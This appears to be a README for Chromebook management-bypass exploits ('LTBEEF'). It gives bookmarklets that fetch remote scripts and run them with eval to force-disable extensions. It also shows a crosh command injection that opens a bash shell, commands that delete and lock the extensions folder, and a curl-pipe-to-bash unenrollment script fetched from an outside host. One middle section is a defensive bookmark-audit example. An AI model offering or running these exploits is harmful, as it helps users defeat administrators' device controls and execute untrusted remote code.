Bookmarklet exploit that can force-disable any extension installed on Google Chrome. Also known as LTBEEF.
DO NOT UPDATE YOUR CHROMEBOOK! This exploit has been patched in versions 106 and above, so do not update! If your version is above 106, try this method
If you need any help, please go here: https://github.com/3kh0/ext-remover/discussions
Here are the instructions for using this exploit! There are two ways: using the GUI and using the IDs. The GUI method is better.
Credit to Nebelung for this, link to the github
For easy setup, go to the website at https://fognetwork.github.io/Ingot
- Show your bookmarks bar with ctrl + shift + b
- Right click on the bar and choose Add Page
- Set the name to Ingot and the URL to the code below or here
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
If this helped please give me a star!
Credit to CompactCow#4717 for the amazing UI!
- Right click on the bar and choose Add Page
- Set the name to GUI and the URL to the code below or here
javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
- Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Use the menu to toggle your extensions!
- Visit chrome://extensions and on the extension you want to disable click on Details
- Copy the text in the URL after the ?id=. For example, if you have this URL:
  chrome://extensions/?id=echoontop
  you would only copy echoontop
- Go to the file bookmark.js, copy everything, create a new bookmark, and use the code you copied as the Page URL
- Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Put the ID you copied into the text box.
You're done! The extension should now be disabled.
- Visit chrome://extensions and on the extension you want to enable click on Details
- Click View in Chrome Web Store
- You will see a banner at the top of the page that says This item has been disabled in Chrome. Enable this item
- Click on Enable this item
You're done! The extension should now be enabled.
Credit bypassi for finding and making this exploit!
Well, it's pretty basic. It finds extensions and displays them on this page with some toggle switches.
Then, it detects when a toggle switch is toggled, and for which extension, and compiles a message to Chrome that says "hey, turn this off for me". Chrome, mistaking this for the webstore, complies.
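A defender-side check for the two bookmarklets above, as an added example that is not part of the original repository: both load and execute remote script from a javascript: URL, which can be spotted in a profile's Bookmarks JSON. The function name auditBookmarks, the pattern ids and the sample tree are assumptions made for illustration.

```javascript
// Added example: audit a Chrome "Bookmarks" JSON tree for javascript: bookmarklets
// that pull in and execute remote code. The sample data below is constructed.
const REMOTE_LOADERS = [
  { id: "script-src-injection", re: /createElement\(\s*['"`]script['"`]\s*\)[\s\S]*\.src\s*=/i },
  { id: "fetch-then-eval", re: /fetch\([\s\S]*\beval\(/i },
  { id: "dynamic-import", re: /\bimport\(\s*['"`]https?:/i },
];

// Walk the bookmark tree (folders have `children`, leaves have `url`).
function* walk(node, path = []) {
  if (!node || typeof node !== "object") return;
  if (node.type === "url") yield { name: node.name, url: node.url || "", path };
  for (const child of node.children || []) yield* walk(child, [...path, node.name]);
}

function auditBookmarks(bookmarks) {
  const findings = [];
  for (const root of Object.values(bookmarks.roots || {})) {
    for (const bm of walk(root)) {
      if (!/^\s*javascript:/i.test(bm.url)) continue;
      // Saved bookmarklets are often percent-encoded; decode before matching.
      let body = bm.url.replace(/^\s*javascript:/i, "");
      try { body = decodeURIComponent(body); } catch { /* keep raw text */ }
      const hosts = [...body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map(m => m[1].toLowerCase());
      const loaders = REMOTE_LOADERS.filter(p => p.re.test(body)).map(p => p.id);
      findings.push({
        name: bm.name, folder: bm.path.join("/"), loaders, hosts: [...new Set(hosts)],
        severity: loaders.length ? "high" : "review", // any bookmarklet is worth a look
      });
    }
  }
  return findings;
}

// Constructed sample in the layout of Chrome's profile "Bookmarks" file.
const SAMPLE = { version: 1, roots: {
  bookmark_bar: { type: "folder", name: "Bookmarks bar", children: [
    { type: "url", name: "Docs", url: "https://example.com/docs" },
    { type: "url", name: "Ingot", url: "javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())" },
    { type: "folder", name: "misc", children: [
      { type: "url", name: "GUI", url: "javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});" },
      { type: "url", name: "Top", url: "javascript:void(window.scrollTo(0,0))" },
    ] },
  ] },
  other: { type: "folder", name: "Other bookmarks", children: [] },
} };

console.table(auditBookmarks(SAMPLE));
```

On managed devices the preventive control is the URLBlocklist policy with the entry `javascript://*`, which stops bookmarklets from running at all; the audit above is for finding devices where they were already saved.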
This exploit details another way to permanently delete extensions. Once done, you can update or restart your chromebook and the extensions will stay gone until you powerwash.
You need a USB for downgrading, and rudimentary knowledge of bash is recommended.
STEPS:
- Downgrade to any version below 101. Instructions are in Chrome100.dev.
- Hit ctrl+alt+t to open a crosh window. If it’s blocked by extensions, use LTBEEF. If it’s policy blocked (“The person who set up this computer has chosen to block this site”) you can try downgrading to a version below 90, where crosh had a different URL.
- Type in
  set_cellular_ppp \';bash;exit;\'
  and hit enter.
- You now have access to a bash shell, logged in as chronos. More information about the permissions of this shell is at the bottom.
- Type
  rm -rf ~/Extensions/*
  THIS WILL BREAK EVERY EXTENSION ON YOUR CHROMEBOOK. If there are extensions you want to keep, they can be selectively removed by ID using
  rm -rf ~/Extensions/InsertIdHere
- Run
  chmod 000 ~/Extensions
  This marks the extension folder as read only, stopping it from updating in the future or any new extensions from being installed.
- You can now restart chrome, allowing it to update to the latest version. Once rebooted onto the latest version, all removed extensions will have the default icon and won’t function at all.
Things you can’t do
- Run sudo or su into root. There might be ways to privilege escalate to root using disclosed chromium bug reports, but at the moment I have not gotten any of them to work on managed chromebooks.
- Enable dev mode or use dev mode things
- Write to certain protected folders
- Install packages
- Install your own extensions. There is no known way (right now) to do that, so don’t ask. Please suggest any ideas.
- Modify an existing extension. Extensions are checksummed before running, so any modification will result in chrome thinking the extension is “corrupted” and trying to redownload it, failing if the directory is marked readonly.
If anyone knows some fun commands for the bash shell to break things even further, let me know!
Thanks to CoolElectronics for finding this amazing trick, trent:gra.im and justinchrm for helping with some parts, and the discoverer of the original bash shell exploit found here https://bugs.chromium.org/p/chromium/issues/detail?id=1329945
Note: This only works on version 101!
Run the following commands in crosh:
set_cellular_ppp \';bash;exit;\'
bash <(curl https://coolelectronics.me/unenroll101.sh)